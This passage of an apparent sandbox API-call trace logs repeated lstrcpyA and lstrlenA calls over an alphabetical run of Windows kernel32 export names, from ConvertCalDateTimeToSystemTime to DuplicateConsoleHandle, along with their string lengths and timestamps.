lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.601] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.601] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.601] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.601] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.601] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.601] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.601] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.601] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.601] lstrlenA (lpString="COPYFILEA") returned 9 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.601] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.601] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.601] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.601] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.601] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.602] lstrlenA (lpString="COPYFILEW") returned 9 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.602] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.602] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.602] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.602] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.602] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.602] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.602] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.602] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.602] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.602] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.602] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.602] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.602] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.602] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.603] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.603] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.603] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.603] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.603] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.603] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.603] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.603] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.603] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.603] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.604] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.604] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.604] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.604] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.604] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.604] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.604] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.604] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.604] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.604] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.605] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.605] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.605] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.605] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.605] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.605] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.605] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.605] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.605] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.605] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.605] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.605] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.605] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.605] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.605] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.605] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.605] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.605] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.605] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.606] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.606] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.606] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.606] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.606] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.606] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.606] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.606] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.606] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.606] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.606] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.606] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.606] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.606] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.606] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.606] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.606] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.606] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.606] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.607] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.607] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.607] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.607] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.607] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.607] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.607] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.607] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.607] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.607] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.607] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.607] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.607] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.607] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.607] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.607] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.607] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.607] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.607] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.608] lstrlenA (lpString="DELETEATOM") returned 10 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.608] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.608] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.608] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.608] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.608] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.608] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.608] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.608] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.608] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.608] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.608] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.608] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.608] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.608] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.608] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.608] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.608] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.609] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.609] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.609] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.609] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.609] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.609] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" 